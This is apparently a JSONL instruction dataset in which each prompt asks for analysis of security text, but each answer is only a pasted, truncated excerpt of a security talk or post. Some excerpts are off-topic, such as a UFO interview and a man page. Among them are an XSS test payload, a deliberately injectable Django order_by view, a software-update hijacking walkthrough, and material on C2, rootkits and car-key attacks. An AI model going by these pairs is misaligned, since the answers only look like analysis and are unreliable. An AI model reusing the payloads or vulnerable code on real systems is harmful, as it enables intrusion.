{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nzsxq Hacking动化就是好玩的星球相关星球介绍: https://mp.weixin.qq.com/s?__biz=MzU2NzcwNTY3Mg==&mid =2247484177&idx=1&sn=e394fc7db94d90fd64b2402ba54a4731&chksm=fc986a36cbefe3202b37f8943b11b 98176b14d0f2c139857b5510c2ac49acf2e462d06629799&token=338286590&lang=zh_CN#rd 很多客和安全具的构造是那么巧妙我看了很多安全具的代码将它们值得学习的地记录了下来点点 开发+安全的结合Hacking动化就是好玩这个仓库将持续更新星球中的精华章源码和思路付费加是我 更新的动 星球作业整理 第期Goby指纹和Poc的提取法 (已完结) 题https://t.zsxq.com/eyfybqv 第期调goby指纹的识别扫描 (已完结) 题https://t.zsxq.com/eyfybqv 第三期兼容社区PoC的通验证具 (进中) 题:https://t.zsxq.com/UF2BMvJ 最新推荐 go-strip 更新啦 v2.0 成品+源码 https://t.zsxq.com/rzvRnEm 通验证码识别库源码可以识别英数+汉字 https://t.zsxq.com/u7AyFe6 sliver c2相关的原理 https://t.zsxq.com/ny7IIUj hacking8的chrome插件计划(doing) https://t.zsxq.com/nAQvrNr https://t.zsxq.com/nqVNVz3 Go Rat + electron https://t.zsxq.com/JE27iea Windows补丁对具是怎么做的 https://t.zsxq.com/6yv7AEi ssrfmap 原理 https://t.zsxq.com/z7yFIIE ksubdomain 重构记录 信息流的src资产收集 SRC资产数据 的是ksubdomain https://t.zsxq.com/ZRrnmmy linux rootkit  https://t.zsxq.com/NFeiM3N dom-based-xss-finder 采AST+js动态hook查找dom-xss的原理 dom-based-xss-finder 动查找dom-xss的原理dom-based-xss-finder是个chrome插件采 AST语法解析js动态hook的式来检测dom-xss并会给出对应的调堆栈 https://t.zsxq.com/6YfEAeE XssSnpier原理 XssSnpier是来3600kee的个检测xss的chrome插件看了下它的概原理基于fuzz和基于监 控error报错信息的半动插件 https://t.zsxq.com/2RbuZ7U dalfox源码学习 在信息流上看到有star这个项dalfox是个基于golang的xss扫描器介绍说基于golang/DOM parser https://t.zsxq.com/3rZbi2r crawlergo源码的学习 crawlergo源码的学习以前就想写动态爬了因为能原很多事情现在终于可以试试了.准备写 份更新在知识星球 (开坑) https://t.zsxq.com/JIYNNNR https://t.zsxq.com/JYbuBEQ https://t.zsxq.com/6MNfauz cs上线器源码和相关原理 https://t.zsxq.com/uVnqjyb https://t.zsxq.com/jyfAynI 模仿cs写c2 https://t.zsxq.com/aAmIqVJ 个免杀的框架它的思想和作流应该是武器化应有的样 https://t.zsxq.com/ieamiYn dll劫持 加动化改造(done) https://t.zsxq.com/ZRZRbUB https://t.zsxq.com/Ju7aMzf https://t.zsxq.com/EeiieY7 https://t.zsxq.com/Qv3BUny https://t.zsxq.com/NfAaQje https://t.zsxq.com/QZjY76Y https://t.zsxq.com/v3RRrrz https://t.zsxq.com/rNrBA6m 宝塔的研究 https://t.zsxq.com/BU72BEI go-strip 1.0的源码 https://t.zsxq.com/6IurbMR 对NTFS transactions的研究 h", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIntelligence Gathering DefCon X Vic Vandal vvandal@well.com NECESSARY DISCLAIMER: This talk discusses various illegal techniques and concepts. The author does not endorse nor does he condone the execution of any of those illegal activities discussed. ESPECIALLY the Information Warfare concepts. Types of Intelligence Gathering  Competitive Intelligence  Corporate Espionage  Information Warfare  Personal Investigation (*This talk is NOT about going to school to become intelligent, in case anyone expected that to be covered.) Competitive Intelligence  Relies solely on legal and ethical means to gather data, piece it together to form information, and analyze it to create intelligence for the use of decision-makers  Over 95 percent of the information companies require to compete successfully is available in the public domain  Helps organizations better understand their competitive environment and make sound business decisions Corporate Espionage Corporate Espionage  Espionage - the collection, collation, and analysis of illicitly gained information  Corporate Espionage - the theft of trade secrets for economic gain  Trade Secret - property right which has value by providing an advantage in business over competitors who do not know the secret  International Trade Commission estimates current annual losses to U.S. industries due to corporate espionage to be over $70 billion How Its Generally Done  Over 70% of capers involve Inside Jobs  Disgruntled employees  Bribes from a competitor  Cleaning crews  Industrial mole  False Pretenses  Companies hire a competitors employee for their trade knowledge  Applicant interviews only to pump potential employer for information, or vice versa  Spy pretends to be a student, journalist, or venture capitalist Whos Doing It?  Foreign governments and corporations  Russia, China, South Korea, India, Pakistan, Germany, Israel, Argentina, Taiwan, Indonesia, France, etc.  FBI indicates that 57 of 173 nations are running operations to actively t", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n0x01 前言 中午在学校午休就看了 @忍酱 的反制Goby @暗羽师傅 的反制Burpsuite还有 @先知社区 里的反制蚁 剑, @f4ltJ4y 的蚁剑复现挑起了我想反制的心 蚁剑版本: 2.1.12 0x02 虚假XSS 蚁剑是自带浏览器的用的是Chrome本想着暗羽师傅的那篇可以用得到发现版本不对 发现它调用了dhtmlx框架可以解析HTML 正是因为这个虚假的XSS更加激发了我想RCE的心 我们可以参考 https://xz.aliyun.com/t/8167 <img src=1 onerror=alert(1)> 0x03 放弃RCE 我在想既然有内置浏览器那么 Chromium浏览器 版本是否存在漏洞呢 我们先得获取Chromuim版本 如上图谷歌浏览器的产品代号为\"Mozilla\" 上图已知 Chrome/69.0.3497.106 Electron/4.0.3 我们查找相对应的远程代码执行的漏洞 # Console navigator.appCodeName navigator.appVersion \"5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) antsword/2.1.12 Chrome/69.0.3497.106 Electron/4.0.3 Safari/537.36\" 已关闭沙箱 通过万能的百度我找到一个 Google Chrome < = 87.0.4280.88 远程代码执行 尝试后我实在是想不明白这个DevTools怎么搞我想尝试别的版本高版本低版本我都试过了都是 同一个问题希望有师傅能够解惑我太菜了 0x04 Self-RCE 峰回路转本来我是打算放弃的就随便点点插件里的内容我是原先有下载一个Redis管理的插件的 # 参考文档: https://www.cnblogs.com/ethtool/p/14652420.html https://github.com/r4j0x00/exploits/blob/master/CVE-2020-16040/exploit.js 直接通过HTML的方式解析 https://github.com/AntSword- Store/AS_Redis/blob/fac78f9605c4cee4d863b1c68a368916dc854051/libs/core.js 阅读了这个插件的源代码发现并没有过滤以及加以限制而且 dhtmlx 解析这应该是蚁剑开发的标 准要求 <img src=1 onerror=alert(1)> 'use strict' class Core { constructor(ShellCore, opt = {}) { this.ShellCore = ShellCore; this.host = opt['host'] || \"127.0.0.1:6379\"; } setHost(host) { this.host = host; } // 将 buffer 转为 base64 string encode(buffer) { return Buffer.from(buffer).toString('base64'); } decode(str) { if (str.indexOf('ERROR://') > -1) { throw new Error(str); } let b64buff = Buffer.from(str, 'base64'); if (b64buff.toString().indexOf('ERROR://') > -1) { throw new Error(b64buff.toString()); } return b64buff; } get template() { let that = this return { 'php': (cmdbuf) => { return { _: `$cmd=base64_decode(\"${that.encode(cmdbuf)}\"); $conn=@stream_socket_client(\"tcp://${that.host}\", $errno, $errstr, $timeout=30); if(!$conn){ echo \"LUVSUiBDb25uZWN0aW9uIFJlZnVzZWQ=\"; }else{ @fwrite($conn,$cmd,strlen($cmd)); $resp=@fread($conn, 8196); @stream_set_blocking($conn,0); while($buf=@fread($conn,8196)){$resp.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWindows Offender: Reverse Engineering Windows Defender's Antivirus Emulator Alexei Bulazel @0xAlexei DEF CON 26 About Me  Security researcher at ForAllSecure  Firmware RE & cyber policy at River Loop Security  RPI / RPISEC alumnus  First time speaking at DEF CON! @0xAlexei This is my personal research, any views and opinions expressed are my own, not those of any employer This Presentation Is...  A deeply technical look at Windows Defender Antivirus binary emulator internals  As far as I know, the first conference talk about reverse engineering any antivirus softwares binary emulator This Presentation Is...  A deeply technical look at Windows Defender Antivirus binary emulator internals  As far as I know, the first conference talk about reverse engineering any antivirus softwares binary emulator This Presentation Is Not  An evaluation of Windows Defender Antivirus efficacy as an antivirus product  Related to Windows Defender ATP, or any technologies under the Windows Defender name Outline 1. Introduction a. Background b. Introduction to Emulation 2. Tooling & Process 3. Reverse Engineering 4. Vulnerability Research 5. Conclusion Why Windows Defender Antivirus Windows built-in antivirus software:  Now the Defender name covers multiple mitigations and security controls built into Windows  This presentation is about Windows Defender Antivirus, not Windows Defender ATP, Application Guard, Exploit Guard, etc Why Windows Defender Antivirus  Huge AV market share - 8% of systems running Windows 7 and Windows 8 are running Windows Defender and more than 50% of Windows 10 devices* *windowsreport.com/windows-defender-enterprise-antivirus/ Windows built-in antivirus software:  Now the Defender name covers multiple mitigations and security controls built into Windows  This presentation is about Windows Defender Antivirus, not Windows Defender ATP, Application Guard, Exploit Guard, etc Why Windows Defender Antivirus  Huge AV market share - 8% of systems running Windows 7 and Wind", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# twofi软件包描述 当尝试破解密码时自定义单词列表对于标准字典是非常有用的补充 最初在7 Habits of Highly Effective Hackers博客上发布的一个有趣想法是使用Twitter来搜索与正在破解的列表相关的关键字以帮助生成这些自定义单词列表 这个想法扩展进了twofi它采用多个搜索关键字来返回单词列表并按最常见的在前进行排序 资料来源http://www.digininja.org/projects/twofi.php [twofi主页](http://www.digininja.org/projects/twofi.php) | [Kali twofi资源](http://git.kali.org/gitweb/?p=packages/twofi.git;a=summary) - 作者Robin Wood - 许可Creative Commons Attribution-Share Alike 2.0 ## twofi包含的工具 twofi - Twitter单词利用 ``` root@kali:~# twofi -h twofi 1.0 Robin Wood (robin@digininja.org) (www.digininja.org) twofi - Twitter Words Of Interest 用法twofi [选项] --help-h 显示帮助 --count-c 包含单词计数 --min_word_length-m 最小单词长度 --term_file-T file 包含关键字列表的文件 --terms-t 逗号分隔的搜索关键字包含空格的要加引号逗号后面不留空格 --user_file-U file 包含用户列表的文件 --users-u 逗号分隔的用户名包含空格的要加引号逗号后面不留空格 --verbose-v 显示详细信息 ``` 原文链接http://tools.kali.org/information-gathering/twofi(http://tools.kali.org/information-gathering/twofi)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFORENSIC FAILS SHIFT + DELETE WONT HELP YOU HERE ERIC ROBI + MICHAEL PERKLIN DEFCON 21 AUGUST 4, 2013 ABOUT THIS GUY ERIC ROBI Founder of Elluma Discovery - 11 years Forensic Examiner Thousands of exams Expert Witness Likes Cats ABOUT THIS OTHER GUY MICHAEL PERKLIN Senior Investigator / Forensic Examiner Security Professional Thousands of exams Likes to break things ... A Lot AGENDA 7 Stories full of FAIL Learn something about Forensic Techniques Fails brought to you by both THE SUSPECT and THE EXAMINER *Names have been changed to protect the idiots on both sides *Many of the case facts have been changed too. I dont know why. We dont need to. It just seemed like a nice thing to do. This presentation required the creation of Teh Fail Matrix 10 5 5 15 35 Fail Matrix Lost the case $$$$ GF left him Personal Fial FAIL #1 - The Wasnt Me Defense Employee Bob worked in sales at Acme He resigned his position and left to work for a competitor Allegation was made that he took Acmes company list with him FAIL #1 - The Wasnt Me Defense Bob said Ive got nothing to hide. Come at me bros!. We began imaging the drive and started planning the examination Look for deleted files in unallocated space Look for recent files used by common programs (Word, Excel) Look for USB device insertion Finally the drive finished imaging... DEFCON EXCLUSIVE... New finding! FAIL #1 - The Wasnt Me Defense Bob had used a data destruction program to overwrite every byte of unallocated space on his drive He used a pattern that was not likely to appear through normal use of a Windows operating system The existence of this pattern MIGHT suggest POSSIBLE willful destruction of evidence ...maybe What have we learned... #1 Data destruction software can almost ALWAYS be detected Even if you dont use a repeating pattern, its still detectable We may not know what you destroyed But we definitely know you destroyed SOMETHING Also, mean phrases make people dislike you. 12 12 3 0 27 Fail Matrix Lost the case Under $10", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n侠盗猎车数字钥匙Hacking 演讲人@Kevin2600 @MonkeyKing 2 0 1 8 #Whoami @Kevin2600 银基安全研究员 专注无线电和嵌入式系统安全 会棍: KCON; XCON; 阿里先知; BESIDES; OZSECON; DEFCON26 PART 01 汽车钥匙简史 101 目录 CONTENTS PART 02 安米钥匙架构 & 功能 PART 03 安米钥匙攻击点分析 RF 干扰攻击 钥匙共享分析 蓝牙加密破解 01 02 03 PART 01 汽车钥匙简史 汽车钥匙 101  机械钥匙 (仍在使用)  远程控制 (红外线; 固定码; 滚动码)  RFID (无线射频车辆身份编码识别  数字钥匙 (手机即为钥匙未来趋势) 新趋势 ? 经典案例  RKE KeeLoq algorithm cracked (2008)  Passive Keyless entry Keyfob Relay attack (2012)  Gone in 60 seconds -- Hijacking with Hitag2 (2012)  Samy's Rolljam -- Drive it like you hacked it (2015)  BMW ConnectedDrive -- Telematics hacked (2015)  Mitsubishi Outlander WIFI Hacked -- PenTestPartners (2016)  14 vulnerabilities found in BMW connected cars -- KeenLab (2018) 新趋势 新HACK  2015 新趋势 新HACK  2016 PART 02 安米钥匙架构 & 功能 数字钥匙  安米 功能  Keyless Entrance System  Keyless Engine Start/Stop  Bluetooth Low Energy 4  Auto Lock/Unlock Function  Mobile as Key (Android; Iphone)  Remote Keys Sharing (20 Users) 安米部件 安米配对 支持车型 安米内部1 安米内部2 安米内部3  B T L E - M o d u l e ( C C 2 6 4 0 ) to communicate with mobile APP through 2.4ghz  RF-Module(NXP-61X0915) Emits unlock/lock cmd to the vehicle. RF-module vary from different car models  BTLE-Module (SYD8801) sensor. 2.4GHz BTLE SOC 32- bit ARM Cortex-M0. Functionality unknown ? 神秘的传感器 神秘的传感器 无线模块 Oscillator: 13.560Mhz Math: 13.560MHz / 8000 = 1695hz 13.560MHz * 32 = 433.92Mhz SDR-HackRF SDR-GQRX 蓝牙模块 蓝牙模块 蓝牙模块 安米APP 安米APP 安米APP 安米APP 安米APP 安米APPServer 毫无隐私可言.... Encryption ? 超级安全 PART 03 安米钥匙攻击点RF 干扰攻击 RF-干扰器 RF-干扰器 安米安全否 安米单向通讯... 演示: PART 04 安米钥匙攻击点钥匙共享分析 共享功能 共享功能 What could possibly go wrong ? 微信共享 微信共享 演示 删除账号 ? 演示 账号过期 ? 演示 PART 05 安米钥匙攻击点 蓝牙加密破解 BTLE数据包分析 BTLE数据包分析 BTLE数据包分析 BTLE -- 1st 尝试 BTLE登录验证 BTLE登录算法 BTLE登录协议 BTLE登录算法 BTLE登录算法 BTLE登录算法 Login加密算法  1-byte of encryption key  使用 XOR 作为所谓的加密算法  所需参数均可通过蓝牙抓包获取 Login蓝牙抓包 Login蓝牙抓包 LoginCrafting Packets 演示 漏洞报告 总结  Security by obscurity ???  100 % 的绝对安全并不存在  新的趋势将会带来新的攻击点  安全测试 + 安全测试 + 安全测试 谢谢观看 演讲人 @Kevin2600 @MonkeyKing", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDomain Fronting is Dead, Long Live Domain Fronting Using TLS 1.3 to evade censors, bypass network defenses, and blend in with the noise Erik Hunstad Outline 0 Domain Fronting 101  If you wish to make an apple pie from scratch, you must first invent the universe  To understand Domain Fronting, you must first understand HTTP over TLS (aka HTTPS)  Server Name Indication (SNI) allows multiple sites to be hosted on the same IP  TLS 1.3 enables encrypted certificates and encrypted Server Name Identification (ESNI)  DNS over TLS or HTTPS + TLS 1.3 = domain fronting 2.0 or domain hiding HTTP Basics  First, a user requests the IP of a server via DNS  This is an unencrypted packet sent to UDP port 53 HTTP Basics  The DNS server responds with an IP address  The response is also unencrypted HTTP Basics  The user sends a GET request, using the domain in the Host header  TCP port 80 - unencrypted HTTP Basics  The server responds with HTML content HTTP Basics  Obviously bad because nothing is encrypted  Both the DNS and HTTP request and response are in plaintext HTTP Basics  Obviously bad because nothing is encrypted  Both the DNS and HTTP request and response are in plaintext HTTPS Basics  Starts off the same way, a user requests the IP of a server via DNS  This is an unencrypted connection on UDP port 53 HTTPS Basics  The DNS server responds with an IP address  The response is also unencrypted HTTPS Basics  The user sends a ClientHello to start the TLS handshake  Server uses the server_name field (plaintext) to lookup how to respond HTTPS Basics  The server responds with a certificate (in plaintext unless TLS 1.3) and completes the handshake  All data after the handshake is encrypted HTTPS Basics  Much better than HTTP  Entire DNS process and the certificate exchange process are still unencrypted HTTPS Basics  Much better than HTTP  Entire DNS process and the certificate exchange process are still unencrypted Domain Fronting  Circumvent censorship by obfuscating the domain of an HTTPS c", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#BHUSA @BlackHatEvents Dive into Apple IO80211Family Vol. II wang yu #BHUSA @BlackHatEvents Information Classification: General About me yu.wang@cyberserval.cn Co-founder & CEO at Cyberserval https://www.cyberserval.com/ Background of this research project Dive into Apple IO80211FamilyV2 https://www.blackhat.com/us-20/briefings/schedule/index.html#dive-into-apple-iofamilyv-20023 #BHUSA @BlackHatEvents Information Classification: General The Apple 80211 Wi-Fi Subsystem #BHUSA @BlackHatEvents Information Classification: General Previously on IO80211Family Starting from iOS 13 and macOS 10.15 Catalina, Apple refactored the architecture of the 80211 Wi-Fi client drivers and renamed the new generation design to IO80211FamilyV2. From basic network communication to trusted privacy sharing between all types of Apple devices. #BHUSA @BlackHatEvents Information Classification: General Previously on IO80211Family (cont) Daemon: airportd, sharingd ... Framework: Apple80211, CoreWifi, CoreWLAN ... ----------------------------- Family drivers V2: IO80211FamilyV2, IONetworkingFamily Family drivers: IO80211Family, IONetworkingFamily Plugin drivers V2: AppleBCMWLANCore replaces AirPort Brcm series drivers Plugin drivers: AirPortBrcmNIC, AirPortBrcm4360 / 4331, AirPortAtheros40 ... Low-level drivers V2: AppleBCMWLANBusInterfacePCIe  Low-level drivers: IOPCIFamily  #BHUSA @BlackHatEvents Information Classification: General Previously on IO80211Family (cont) An early generation fuzzing framework, a simple code coverage analysis tool, and a Kemon-based KASAN solution. Vulnerability classification: 1. Vulnerabilities affecting only IO80211FamilyV2 1.1. Introduced when porting existing V1 features 1.2. Introduced when implementing new V2 features 2. Vulnerabilities affecting both IO80211Family (V1) and IO80211FamilyV2 3. Vulnerabilities affecting only IO80211Family (V1) #BHUSA @BlackHatEvents Information Classification: General Previously on IO80211Family (cont) Some of the vulnerabilitie", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nInterview with Joe McMoneagle on June 5, 2001 RT: The people I speak to seem to accept the extraterrestrial hypothesis as the least unlikely, and when so many people of this caliber take it seriously, I am suggesting that we should too ... how would you define your understanding of or relationship to UFO phenomena? JM: I have two levels of experience. One is through remote viewing. The other is what I personally experienced. In 1966 in the Bahamas I had a UFO experience  an unidentified flying or at least hovering object that had a profound impact on me. There were physiological effects. I wound up getting a really bad sunburn from it. I was working on an island called Eleuthera, a downrange missile tracking site from Canaveral, and my partner and I were heading back toward quarters, taking a shortcut across the sand dunes. It was about 12:30 in the morning and the whole place lit up like high noon, as if the sun had come up. We looked up to see where the source of the light was and it was a very large disc, an oblique disc, probably fourteen hundred feet above us, going in a sort of start-stop fashion. It was intriguing, because it was very much there  you could see panel lines in it and dimples and opaque sections  it was very very bright, you had to squint  and all sound went away, it was like being in a bell jar. After about fifteen seconds, our perception was that it shot over the horizon very quickly, almost instantaneously, but in retrospect it could have just folded out of time-space too. He and I went back up to the club and had a few beers and talked about it. We decided we werent going to report it because we were in the military and didnt want to go to southeast Asia. The next morning, he was taken back to Homestead AFB and hospitalized and I had a really bad sunburn, what I called a sunburn, it was obviously radiation burns of some kind. I probably got away with it better than he did because I was darker skinned at the time. I had been in the water more", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMeasuring and Integrating the Shadow Economy: A Sector-Specific Approach Brian K. Edwards, Ph.D. Silvio J. Flaim, Ph.D. Los Alamos National Laboratory June 30, 2008 2 Overview  Scope of shadow economic activity  Size of shadow economy in the United States and other countries  Why shadow economies exist  Adding a shadow information sector to simplified version of the official economy  Shadow-official economy interactions  Benefits and burdens of shadow economic activity 3 The Scope of Shadow Economy Activity All do-it-yourself work and neighbor help Barter of legal goods and services Employee discounts, fringe benefits Income from self- employment; Wages, salaries and assets from unreported work related to legal services and goods Legal Activities in the Shadow Economy Tax Avoidance Tax Evasion Tax Avoidance Tax Evasion Nonmonetary Transactions Monetary Transactions Adapted from Schneider and Enste (2000). Barter: stolen goods, smuggling, etc. Produce or growing drugs for own use. Theft for own use. Trade in stolen goods; drug dealing and manufacturing; prostitution, gambling, smuggling (international and inter-state) and fraud. Counterfeiting. Computer system hacking; trading stolen information; identity theft; spamming (?) Illegal Activities 4 Measuring the Shadow Economy  Virtually all previous studies on measuring the size of the shadow economy focus on the aggregate shadow economy, usually expressed in terms of the size of the official economy.  Little or no work attempting to estimate the size of specific shadow economy sectors within the context of the rest of the legal economy. 5 Shadow Economy in US  Schneider and Enste (2000) estimate the total US shadow economy at between 8 and 10 percent of US GDP, or from $1 to $1.4 trillion.  Evidence on the size of specific sectors of the shadow economy in the US is largely anecdotal, and does not attempt to analyze how the shadow economy is linked to the official economy. 6 International Comparisons  Estimates of the ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Day Of The Update Once upon an Update  Itzik Kotler Tomer Bitton Update? I already donated  Ability to delivery bug fixes or new features to existing customers of applications  Natural inhibitors:  Punch Cards  BBS/Modem  Floppies/CDs  Internet Whats The Big Update?  Updates are usually a background tasks, thus draw little attention from the user  Most updates are binaries that gets executed on the updater machine  An update can be used to manipulate sensitive data such as anti-virus rules  Update can be silently tampered with it, leaving almost no trace behind Catching an Update  Feasible over a variety of MITM Attacks:  Wi-Fi via Open/Weak Cryptography  LAN via ARP Poisoning  WAN via DNS Cache Attack (Thanks Dan!)  Wi-Fi is our favorite choice, common in Airports/McDonalds/Café shops and etc. Subverting The Update Procedure  Client asks Server whether its up to date  Replied with Negative Answer  Client asks Server for Download Sites  Replied with Malicious Sites OR  Client downloads from a Known Site  Redirected into a Malicious Site Subverting The Update Connection  Spoofing Server Reply:  IP:  Invert source and destination addresses  TCP:  Invert source and destination ports  SEQ is received ACK  ACK SEQ is received DATA + SEQ  One Shot, One Kill Flags: PUSH + ACK + FIN  FIN flag is muting the Server, and possibly causing the Client to disconnect afterward Subverting The Update Agent  Client accesses a Document (XML/INI/...)  Reply w/ 200 OK (Cooked Data)  Document contains Malicious Binary Sites  Client downloads a File  Reply w/ 302 (Redirection)  Redirection to Malicious Binary Site  Server  Will be Ignored (muted at Connection Level) Attack Walkthrough: 200 OK w/ Cooked Data Target Application: Notepad++ Notepad++ Checks For a New Version Replied w/ 200 OK (Cooked Data) 200 OK w/ Cooked Document  Update expects:  List of Sites for Downloads  Upcoming downloads will go to our sites  Is There A Newer Version Available?  Theres always a newer version for y", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTransparent Malware Debugging on x86 and ARM Zhenyu Ning and Fengwei Zhang COMPASS Lab Wayne State University April 27, 2018 1 Outline I Introduction I Background I Towards Transparent Malware Analysis I MalT on x86 Architecture I Ninja on ARM Architecture I Conclusions 2 Outline I Introduction I Background I Towards Transparent Malware Analysis I MalT on x86 Architecture I Ninja on ARM Architecture I Conclusions 3 Transparency What is transparent malware analysis? 4 Transparency What is transparent malware analysis? I Analyzing the malware without being aware. I Transparent means that the malware cannot detect it. 5 Transparency Why transparency is important? 6 Evasive Malware Computer System Application Malware 7 Evasive Malware Computer System Application Malware Analyzer 8 Evasive Malware Computer System Application Application Analyzer 9 Malware Analysis What is the current state of malware analysis systems? 10 Malware Analysis Application Operating System Hypervisor/Emulator App App Malware 11 Malware Analysis Application Operating System Hypervisor/Emulator App App Malware Malware Analyzer 12 Malware Analysis Application Operating System Hypervisor/Emulator App App Malware Malware Analyzer I Unarmed to anti-virtualization or anti-emulation techniques. I Large performance overhead. 13 Malware Analysis Application Operating System Hypervisor/Emulator App App Malware Malware Analyzer 14 Malware Analysis Application Operating System Hypervisor/Emulator App App Malware Malware Analyzer I Unable to handle malware with high privilege (e.g. rootkits). 15 Transparency Requirements What makes a transparent malware analysis system? 16 Transparency Requirements I An Environment that provides the access to the states of the target malware. I An Analyzer which is responsible for the further analysis of the states. 17 Transparency Requirements I An Environment that provides the access to the states of the target malware. I It is isolated from the target malware. I It exists", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nfrom django.shortcuts import HttpResponse from .models import Collection # Create your views here. def vul(request): query = request.GET.get('order', default='id') q = Collection.objects.order_by(query) return HttpResponse(q.values())", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nXMPP/Jabber  Transports  Short mail  Internet to mobile communications www.g2-inc.com 2  Number + Carrier = Victim  Users get email message with subscription (texting)  Received as a text message and not an email  Cost equivalent to standard text message www.g2-inc.com 3  Conventional spamming techniques  Mass emailers  Spoofing the source address  Carrier can be identified by services online  Scriptable  Short mail is accepted by default www.g2-inc.com 4  Anything past 160 characters may be dropped  Carrier must be properly identified for message to go through  No delivery confirmation www.g2-inc.com 5  Incoming text = charge to the user  Send short mail from any mail client  Turned on by default  Carrier offers limited methods to stopping the attack www.g2-inc.com 6  Sprint  50 max email/domain blocked  Cant block everything  Verizon  10 max email/domain blocked  Can block everything  AT & T  15 max email/domain blocked  Cant block everything www.g2-inc.com 7  Short mail should not be directly tied into SMS  Possible flagged of message to identify origin  Feature should be easily adjusted by the user  Should be turned off by default  More power should be given to block unwanted messages www.g2-inc.com 8  Communications through XML  Setting up your own server is easy  Multiple options for different platforms  Allows for bonding to legacy chat implementations  Control of message flow  No rate limiting www.g2-inc.com 9  Google Talk, Yahoo, AIM, MSN (in some areas)  Input a users phone number and their now a contact  Messages get sent in the form of an SMS message www.g2-inc.com 10  Google forces a user to respond after a chat is initiated  No response after a few messages = no more talk  Yahoo forces a user to respond after a chat is initiated and performs throttling  AOL does NOT force a user to respond but does throttle www.g2-inc.com 11  Rate limiting is imposed when sending messages too fast  Messages past 160 characters are split into multiple messages and NOT d", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" Copyright 1993 David Metcalfe (david@prism.demon.co.uk) .\\\" .\\\" Permission is granted to make and distribute verbatim copies of this .\\\" manual provided the copyright notice and this permission notice are .\\\" preserved on all copies. .\\\" .\\\" Permission is granted to copy and distribute modified versions of this .\\\" manual under the conditions for verbatim copying, provided that the .\\\" entire resulting derived work is distributed under the terms of a .\\\" permission notice identical to this one .\\\" .\\\" Since the Linux kernel and libraries are constantly changing, this .\\\" manual page may be incorrect or out-of-date. The author(s) assume no .\\\" responsibility for errors or omissions, or for damages resulting from .\\\" the use of the information contained herein. The author(s) may not .\\\" have taken the same level of care in the production of this manual, .\\\" which is licensed free of charge, as they might when working .\\\" professionally. .\\\" .\\\" Formatted or processed versions of this manual, if unaccompanied by .\\\" the source, must acknowledge the copyright and authors of this work. .\\\" .\\\" References consulted: .\\\" Linux libc source code .\\\" Lewine's _POSIX Programmer's Guide_ (O'Reilly & Associates, 1991) .\\\" 386BSD man pages .\\\" Modified Sun Jul 25 10:40:44 1993 by Rik Faith (faith@cs.unc.edu) .TH STRCOLL 3 1993-04-12 \"GNU\" \"Linux Programmer's Manual\" .SH NAME strcoll \\- 用当前的区域选项来比较两个字符串 .SH \"总览 (SYNOPSIS)\" .nf .B #include <string.h> .sp .BI \"int strcoll(const char *\" s1 \", const char *\" s2 ); .fi .SH \"描述 (DESCRIPTION)\" \\fBstrcoll()\\fP 函数 是用来 比较 \\fIs1\\fP 和 \\fIs2\\fP 两个 字符串的. 如果 \\fIs1\\fP 不为空, 它会 返回 一个 小于, 等于 或者 大于 零的 整数 分别来 表示 它 小于, 等于 或者 大于 \\fIs2\\fP. 它是 根据 程序 当前的 区域选项 中的 \\fILC_COLLATE\\fP 来 比较的. (见 \\fBsetlocale\\fP(3)). .SH \"返回值 (RETURN VALUE)\" 如果 \\fIs1\\fP 不为空, \\fBstrcoll()\\fP 函数 会 返回 一个 小于, 等于 或者 大于 零的 整数 分别来 表示 它 小于, 等于 或者 大于 \\fIs2\\fP. 每个 字符串 都根据 当前的 区域选项 来解释. .SH \"遵循 (CONFORMING TO)\" SVID 3, BSD 4.3, ISO 9899 .SH \"注意 (NOTES)\" 如果 区域选项 是 \\fI\"POSIX\"\\fP 或者 \\fI\"C\"\\f", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFrom LNK to RCE Finding bugs in Windows Shell Link Parser Lays Who am I - Lays  Senior Researcher at TeamT5  Focus on Reverse Engineering / Vulnerability Research  MSRC Most Valuable Security Researcher 2019 / 2020  Acknowledged by Microsoft / Samsung / NETGEAR / Synology   HITCON / 217 CTF Team  Co-Founder of Pwnable.tw Agenda  Motivation  Windows LNK File Format  Fuzzing the Parser  Case Study  Reversing the Undocumented Logic  Case Study  Conclusion Motivation Motivation  While studying for masters degree  I created a Fuzzer for Windows  Based on WinAFL + Static Binary Instrumentation  High Performance Coverage-Guided Fuzzing without source code  I need some Real-World Targets! Finding Fuzzing Targets  Complex Binary Format  Which is (Win)AFL good at  Better to be remote triggerable Finding Fuzzing Targets  Complex Binary Format  Which is (Win)AFL good at  Better to be remote triggerable Windows LNK File  Also known as Shortcut  Windows Shell Link  What you See is What you Parsed  